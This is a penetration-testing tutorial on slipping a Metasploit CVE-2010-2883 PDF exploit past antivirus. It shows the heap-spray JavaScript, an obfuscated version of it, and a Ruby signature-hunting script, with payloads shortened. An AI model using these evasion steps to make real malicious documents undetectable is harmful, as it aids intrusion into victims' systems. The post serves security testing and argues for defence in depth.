Bypassing antivirus detection on a PDF exploit

September 12, 2016 by Florent Poulain

Every pentester has at some point grappled with an antivirus blocking their tools, be it during a pentest, a phishing campaign, a security awareness demonstration, and so on. Many Internet resources present the usual techniques for bypassing AV signatures when working with executables, or at least when the detection targets the payload in use, such as a meterpreter. In that case, one can resort to encoders, packers, or more manual solutions like modifying and recompiling the exploit code.

But what can be done when the detection targets an exploit for a file format like PDF, while the active payload itself is not detected, rendering encoders useless?

This article gives a few approaches for this kind of situation, and shows the importance of defense in depth when malicious code is able to pass through all the gates and reach the heart of the company.
 

Preparation

The exploit used here is generated by the metasploit module "adobe_cooltype_sing", which exploits CVE-2010-2883 in an old version of a PDF reader, and is of course detected by most antiviruses. The Virustotal rating of the PDF before any tampering is 36/53. Note: in the remainder of the article, only one antivirus is used to assess the detection. Also, for readability, the payloads are heavily shortened (at the location of the "[...]" strings).

We had in mind that, at one point or another, it would be necessary to perform a dichotomic search by overwriting pieces of the file, smaller and smaller, until the signature is precisely located. However, this technique, which is also well known for executable files, risks failing because of possible PDF compression if applied too naively.

Indeed, PDF streams can be compressed (or even encrypted in the case of password-protected PDFs), which is apparently the case for the PDF produced by metasploit: a quick "strings | grep" search for the JavaScript code patterns seen in MSF's ruby module doesn't give any hits. The problem with the dichotomic search is then that it would overwrite compressed bytes, which is likely to corrupt the data and prevent its decompression.

A good idea is therefore to uncompress the PDF's streams with pdftk and continue working from there. The JS code becomes visible inside the new PDF:

$ strings msf_reverse_tcp.pdf | grep var
$ pdftk msf_reverse_tcp.pdf output msf_reverse_tcp_unc.pdf uncompress
$ strings msf_reverse_tcp_unc.pdf | grep var
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000[...]
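
To illustrate why the first strings search comes back empty, here is a minimal sketch in Ruby. It assumes the stream uses zlib-style compression (the usual FlateDecode filter); the sample script text is a hypothetical stand-in, not the actual exploit code.

```ruby
require "zlib"

# Hypothetical stand-in for a script stored in a PDF stream.
plain = "var payload = unescape('%u4141%u4141'); " * 20

# Assumption: the stream is zlib-compressed, like this buffer.
compressed = Zlib::Deflate.deflate(plain)

# The readable pattern is searched before and after decompression.
found_before = compressed.include?("var payload".b)
found_after  = Zlib::Inflate.inflate(compressed).include?("var payload")

puts "pattern visible in compressed bytes: #{found_before}"
puts "pattern visible after decompression: #{found_after}"
```

The same reasoning explains why overwriting arbitrary bytes of a compressed stream is risky: the overwritten bytes no longer form valid compressed data, so the reader cannot restore the original content.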

The file can then be analyzed further. A PDF is usually structured as a set of "objects", "streams", etc. The exploit can be expected to lie inside one of these, and it is worth knowing exactly which one before proceeding with signature hunting. Several tools allow examining this structure and extracting or editing the contents. The Origami library is pretty well known, but another tool with a gentler learning curve, peepdf (available on GitHub), is a lifesaver for this task.
 

Identifying where the signatures are

Once the file is open, peepdf gives a few interesting statistics. It also flags some elements potentially relevant to a malware analyst: notably, an object that contains JavaScript code, id 13, and an object identified as linked to the vulnerability CVE-2010-2883, id 12. Not bad!

$ python peepdf/peepdf.py -i msf_reverse_tcp_unc.pdf
File: msf_reverse_tcp_unc.pdf
Size: 71568 bytes
Version: 1.5
Binary: True
Linearized: False
Encrypted: False
[...]
Version 0:
    Catalog: 1
    Info: No
    Objects (14): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
    Streams (4): [9, 12, 13, 14]
        Encoded (0): []
    Objects with JS code (1): [13]
    Suspicious elements:
        /AcroForm (1): [1]
        /OpenAction (1): [1]
        /XFA (1): [2]
        /JS (1): [4]
        /JavaScript (1): [4]
        CoolType.SING.uniqueName (CVE-2010-2883): [12]

 

Then, using the stream or object commands, the contents of the different elements of the PDF can be printed to the console.

This confirms that the relevant data is probably in streams 12 and 13. Indeed, stream 12 contains a load of binary data, which turns out to be a TTF font when searching the net for the visible headers. This also matches what can be seen in the source code of the metasploit module and the information available about CVE-2010-2883.

PPDF> stream 12
00 01 00 00 00 11 01 00 00 04 00 10 4f 53 2f 32   |............OS/2|
b4 5f f4 63 00 00 eb 70 00 00 00 56 50 43 4c 54   |._.c...p...VPCLT|
d1 8a 5e 97 00 00 eb c8 00 00 00 36 63 6d 61 70   |..^........6cmap|
[...]
09 c6 8e b2 00 00 b4 c4 00 00 04 30 6b 65 a2 6e   |...........0ke.n|
dc 52 d5 99 00 00 bd a0 00 00 2d 8a 6c 6f 63 61   |.R........-.loca|
f3 cb d2 3d 00 00 bb 84 00 00 02 1a 6d 61 78 70   |...=........maxp|
05 47 06 3a 00 00 eb 2c 00 00 00 20 53 49 4e 47   |.G.:...,... SING|
d9 bc c8 b5 00 00 01 1c 00 00 1d df 70 6f 73 74   |............post|
b4 5a 2f bb 00 00 b8 f4 00 00 02 8e 70 72 65 70   |.Z/.........prep|
3b 07 f1 00 00 00 20 f8 00 00 05 68 00 00 01 00   |;..... ....h....|

And stream 13 obviously contains the JavaScript code generated by the metasploit module:

PPDF> stream 13
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u[...]09eb%u7c1d%uae0c%u7e22%u7831%uf41b%ub872%u0718%u9dc9%u8209%ub131%u874a' );
var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf.length + 20 + 8 < 65536) NHsheKH[...]
uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH = SoVA.substring(0, 0x80000 - (0x1020-0x08) / 2);
var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO = new Array();
for (AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL=0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL<0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++) ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]=uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+"s";

Next, the idea is to isolate the contents of the streams one by one, by overwriting all of them but one with a dummy string, then submitting the results to the antivirus and checking how the detection changes.

The modify command of peepdf allows this substitution:

PPDF> modify
Usage: modify object|stream $object_id [$version] [$file]

Modifies the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).

For instance, to substitute stream 12 with a "toto" string and save the result to a file:

PPDF> modify stream 12
Please, specify the stream content (if the content includes EOL characters use a file instead):
toto

Object modified successfully!!

PPDF> save stream12.pdf
File saved succesfully!!

Of course, the same process is repeated for all other suspect streams or objects. In this example, a set of 4 files is generated, with streams 9, 12, 13 and 14 isolated respectively. The resulting files are scanned with the antivirus, and things clearly become a little harder: the tests show that there are at least two different signatures, one for stream 12 and one for stream 13. However, there is no signature in any other object or stream.

[Screenshot: antivirus detection results]

Analysis:

  • "stream12.pdf", which only contains stream 12, the TTF font, is detected as EXP/CVE-2010-2883. Hence, the crafted TTF font responsible for the actual exploitation of the vulnerability is flagged as malicious.
  • "stream13.pdf", which only contains stream 13, the JavaScript code, is detected as EXP/Pidief.hdg. This looks like a more or less generic signature for malicious JS code.

Bypassing the JavaScript signature

The JavaScript code should be easier to modify than the TTF font, because the latter is a binary file format. After a few manual tests, a quick and easy bypass is attempted with an online JavaScript obfuscator.

The JS code from the PDF is copy-pasted into the website, which returns the following code, very different from the original:

var _0x83f1=["\x75\x62\x38\x37\x32\x25\x75\x30\x37\x31\x38\x25\x75\x39 [...] \x64\x63\x39\x25\x75\x38\x32\x30\x39\x25\x75\x62\x31\x33\x31\x25\x75\x38\x37\x34\x61","\x25","\x75","\x30","\x63","\x25\x75","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73"];var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw=unescape;var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT=bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw(_0x83f1[0]);var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf=bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw(_0x83f1[1]+ _0x83f1[2]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[5]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[3]+ _0x83f1[4]);while(NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf[_0x83f1[6]]+ 20+ 8< 65536){NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf+= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf};PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf[_0x83f1[7]](0,(0x0c0c- 0x24)/ 2);PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO+= gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT;PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO+= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf;SoVA= PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO[_0x83f1[7]](0,65536/ 2);while(SoVA[_0x83f1[6]]< 0x80000){SoVA+= SoVA};uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH= SoVA[_0x83f1[7]](0,0x80000- (0x1020- 0x08)/ 2);var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO= new Array();for(AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL= 0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL< 0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++){ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]= 
uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+ _0x83f1[8]}

It remains to put this code back inside the PDF with peepdf's command modify stream 13 modified.js. N.B. if the new data contains line breaks, it is necessary to go through an intermediary file, here modified.js. Afterwards, the antivirus is run on the new file. It is detected as EXP/CVE-2010-2883, which is known to be the signature for the other stream, containing the TTF font. To be sure, the TTF stream is now replaced by a dummy string like "toto": no signature is triggered.

This means that the bypass of the JavaScript signature is successful. That said, the odds of being able to modify the JS enough to make it undetectable were pretty good; they are clearly worse for the exploit's TTF font, which now needs attention.

 

Bypassing the CVE-2010-2883 signature

For the CVE detection bypass, it seemed convenient to come back to good ol' dichotomic signature hunting.

The small script below was written for this purpose; it is quite naive and probably not bug-free, but it covers the needs. It is used like this: ruby chunker.rb <file> <number of chunks> [start offset] [end offset]. If no offsets are specified, the whole file is processed. The script divides the zone to process into the requested number of chunks and overwrites them one by one with strings of "A" characters, writing each result to a new file whose name indicates the overwritten offsets.

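#!/usr/bin/env ruby
# chunker.rb: overwrite successive chunks of a file with "A" bytes and write
# each variant to output/chunk-<start>-<end><ext>.

abort("Usage: #{$0} <file> <number of chunks> [start offset] [end offset]") if ARGV.size < 2

file   = ARGV[0]
amount = ARGV[1].to_i
abort("The number of chunks must be positive") unless amount > 0

# Both offsets must be given together; otherwise the whole file is processed.
if ARGV.size >= 4
  start = ARGV[2].to_i
  endp  = ARGV[3].to_i
else
  start = 0
  endp  = File.size(file)
end

ext = File.extname(file)
Dir.mkdir("output") unless File.exist?("output") # File.exists? no longer exists in Ruby 3.2+

# Binary read, so that no encoding or newline conversion alters the bytes.
data = File.binread(file)
size = (endp - start) / amount # integer division: the trailing remainder is left untouched
abort("The zone is too small for #{amount} chunks") if size < 1

# One output file per chunk ("c <= amount" produced one extra file past the end offset).
amount.times do |c|
  i = start + c * size
  j = i + size

  patched = data.dup
  patched[i, size] = "A" * size # same-length overwrite, so later offsets do not move

  File.binwrite("output/chunk-#{i}-#{j}#{ext}", patched)
end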

To determine the relevant offsets for the first pass, peepdf has a handy offsets command, which lists the starting and ending offsets of the various PDF objects:

PPDF> offsets
   [...]
     556
        Object  9 (114)
     669
     672
        Object  11 (126)
     797
     800
        Object  12 (66000)
   66799
   66802
        Object  4 (60)
   66861
   66864
        Object  13 (53)
   66916
   [...]
   67688
        Trailer (51)
   67738
   67739 EOF

Remember, the stream holding the "malicious" TTF font is number 12, which therefore lies between bytes 800 and 66799. As the PDF being processed is uncompressed, the chunker.rb script can be run directly on the file, between these offsets:

$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 66799

 

As output, 100 new PDF files are generated, whose names indicate the offsets between which the data was overwritten:

$ ls output/
chunk-10026-10685.pdf  chunk-17275-17934.pdf  chunk-24524-25183.pdf  chunk-31773-32432.pdf  chunk-39022-39681.pdf  chunk-46271-46930.pdf  chunk-53520-54179.pdf  chunk-6072-6731.pdf    chunk-7390-8049.pdf
chunk-10685-11344.pdf  chunk-17934-18593.pdf  chunk-25183-25842.pdf  chunk-32432-33091.pdf  chunk-39681-40340.pdf  chunk-46930-47589.pdf  chunk-5413-6072.pdf    chunk-60769-61428.pdf  chunk-800-1459.pdf
chunk-11344-12003.pdf  chunk-18593-19252.pdf  chunk-25842-26501.pdf  chunk-33091-33750.pdf  chunk-40340-40999.pdf  chunk-4754-5413.pdf    chunk-54179-54838.pdf  chunk-61428-62087.pdf  chunk-8049-8708.pdf
chunk-12003-12662.pdf  chunk-19252-19911.pdf  chunk-26501-27160.pdf  chunk-33750-34409.pdf  chunk-4095-4754.pdf    chunk-47589-48248.pdf  chunk-54838-55497.pdf  chunk-62087-62746.pdf  chunk-8708-9367.pdf
chunk-12662-13321.pdf  chunk-19911-20570.pdf  chunk-27160-27819.pdf  chunk-3436-4095.pdf    chunk-40999-41658.pdf [...]
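
The file names above follow directly from the offsets given on the command line. A minimal sketch of the arithmetic, assuming one file per requested chunk and integer division for the chunk size (chunk_ranges is a hypothetical helper, not part of chunker.rb):

```ruby
# Returns the [start, end] offsets overwritten in each output file.
def chunk_ranges(start, endp, amount)
  size = (endp - start) / amount # integer division: a remainder may be left uncovered
  (0...amount).map { |c| [start + c * size, start + (c + 1) * size] }
end

ranges = chunk_ranges(800, 66_799, 100)

puts "chunk size:  #{ranges.first[1] - ranges.first[0]} bytes"
puts "first chunk: #{ranges.first.inspect}"
puts "last chunk:  #{ranges.last.inspect}"
puts "bytes not covered before the end offset: #{66_799 - ranges.last[1]}"
```

With these values each chunk is 659 bytes long, which matches names such as chunk-800-1459.pdf. The last 99 bytes of the zone are not overwritten by any chunk, which is worth keeping in mind if no file escapes detection.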

 

Next, the antivirus is run over this file corpus in cleaning mode, so that only the undetected files remain in the folder. That way, all the zones whose overwriting defeats the AV detection can be seen at a glance.

After this first script run, only one undetected file remains:

[Screenshot: the only undetected file after the first pass]

In conclusion, the signature lies between offsets 800 and 1459. The script can then be run a second time between these new offsets, in order to locate the detected zone more precisely:

$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 1459

This time, the number of detections drops, and the remaining files narrow the detected zone down to offsets 1016 to 1148.

[Screenshot: undetected files after the second pass]
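
Reading the zone off the remaining file names can also be done programmatically. The sketch below is only an illustration: undetected_zones is a hypothetical helper, and the file list is rebuilt from the offsets quoted in the text (6-byte chunks from 1016 to 1148), not taken from an actual scan.

```ruby
# Parses "chunk-<start>-<end>" file names and merges adjacent ranges into zones.
def undetected_zones(filenames)
  ranges = filenames.map do |name|
    m = name.match(/chunk-(\d+)-(\d+)/)
    m && [m[1].to_i, m[2].to_i]
  end.compact.sort

  ranges.each_with_object([]) do |(lo, hi), zones|
    if zones.any? && zones.last[1] >= lo
      zones.last[1] = [zones.last[1], hi].max # contiguous: extend the current zone
    else
      zones << [lo, hi]                       # gap: start a new zone
    end
  end
end

# Hypothetical listing of the files left in output/ after the scan.
survivors = (1016...1148).step(6).map { |i| "chunk-#{i}-#{i + 6}.pdf" }

p undetected_zones(survivors)
```

A single zone in the result means the surviving chunks are contiguous; several zones would hint at more than one signature, or at a signature with gaps.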
 

Apparently, there is no discontinuity in the detection, hence, with a little luck, a single signature covers the whole zone. Therefore, modifying only a few bytes between the 1016th and 1148th bytes could be enough to bypass the antivirus. The problem is that this is now a binary file that needs patching, and the modifications must not "break" the exploit in any way.

The relevant zone is examined in a hexadecimal editor:

[Screenshot: the flagged zone in the hex editor]

It looks like this is in the middle of the TTF file headers. Besides, the header entry announcing the "SING" table, which allows exploitation of CVE-2010-2883, can be seen in the middle of the window. After a few checks, this zone could turn out to be good news. Reading the metasploit module shows that the data important for the exploitation is written at offset 284 (0x11c) of the TTF file; cf. line 124 of the adobe_cooltype_sing.rb module:

ttf_data[0x11c, sing.length] = sing

Yet here, the detection happens between bytes 1016 - 800 = 216 and 1148 - 800 = 348 of the TTF file.

Why this 800-byte correction? Peepdf has shown that the TTF file begins at offset 800 in the PDF file, while the offsets taken from the metasploit module are relative to the TTF file itself. (Strictly speaking, 800 is where object 12 starts, so the font data begins a few bytes later and these figures are approximate.)

In short, it might be possible to manipulate bytes of the TTF file between offsets 216 and 284, which are before the significant shellcode bytes but still inside the antivirus detection zone, and thus to do so without "damaging" the exploit or having to dive into the assembly in order to modify it.
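
The offset arithmetic can be written down as a short sketch. The constant and method names are hypothetical; the values are the ones quoted in the text, with offset 800 taken as the start of the font data as in the reasoning above.

```ruby
OBJECT_START = 800   # offset of object 12 in the PDF, from peepdf's offsets command
SING_OFFSET  = 0x11c # TTF-relative offset where the module writes the SING data

# Converts an offset in the PDF file into an offset relative to the TTF data.
def ttf_relative(pdf_offset)
  pdf_offset - OBJECT_START
end

zone_start = ttf_relative(1016)
zone_end   = ttf_relative(1148)

# Part of the flagged zone that lies before the SING data.
safe_end = [zone_end, SING_OFFSET].min

puts "flagged zone, TTF-relative: #{zone_start} to #{zone_end}"
puts "flagged and before 0x11c:   #{zone_start} to #{safe_end}"
```

This gives 216 to 348 for the flagged zone and 216 to 284 for the part that precedes the exploitation data.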

And finally, what followed was simpler than foreseen :-) Going back to a PDF that held the new obfuscated JavaScript in stream 13, and making a new round with the chunker.rb script from the beginning of the flagged zone inside stream 12, that is from offset 1016, it happened by luck that one of the produced files was perfectly functional as an exploit while being undetected.

Actually, the first produced file, starting at offset 1016, works like a charm! Curiosity urges us to check what exactly the script overwrote:

[Screenshot: diff between the original file and the overwritten one]

4 non-ASCII bytes inside the TTF header were replaced by "A"s. We won't go any further in parsing the TTF header to find out precisely what these bytes are, given that the goal is reached: it is now possible to enjoy successful exploitation and code execution despite the workstation's antivirus.
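
For reference, such a comparison can be done with a few lines of Ruby. This is a minimal sketch: byte_diff is a hypothetical helper, and the two 8-byte buffers are made-up stand-ins for the files, not the actual bytes of the font.

```ruby
# Returns [offset, original byte, patched byte] for every position that differs.
# Both inputs are assumed to have the same length (same-length overwrite).
def byte_diff(original, patched)
  original.bytes.zip(patched.bytes).each_with_index.map do |(a, b), offset|
    [offset, a, b] if a != b
  end.compact
end

# Hypothetical buffers: four non-ASCII bytes replaced by "A" (0x41).
original = "\x00\x01\x80\x81\x82\x83\x00\x20".b
patched  = "\x00\x01AAAA\x00\x20".b

byte_diff(original, patched).each do |offset, a, b|
  printf("offset %d: %02x -> %02x\n", offset, a, b)
end
```

With real files, the two buffers would come from File.binread on the original PDF and on the produced chunk file.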

 

Conclusion

It was possible to combine already known signature isolation techniques with tools able to perform a good parsing of the targeted file format, in order to achieve antivirus bypass. The general approach was:

  • Uncompression of the document and parsing / extraction of the objects
  • Isolation of each object one by one, in order to identify all those responsible for AV detection
  • Obfuscation of detected readable data, like JavaScript code in this case
  • Dichotomic search for signatures inside binary data, and careful modification of the detected zones

This methodology can be extended to other file formats, given access to tools able to extract structures and data that make up those formats.

While antivirus software remains useful for blocking most malicious code, it is generally effective only against already known code. Moreover, we have just seen that it is relatively easy to make a previously flagged file undetectable without altering its operation. Therefore, the defense in depth principle is necessary in order to limit the potential damage caused by malicious code making its way into the heart of internal networks. Likewise, detection capabilities must not be limited to virus detection, but should take into account suspicious behaviours in every part of the Information System.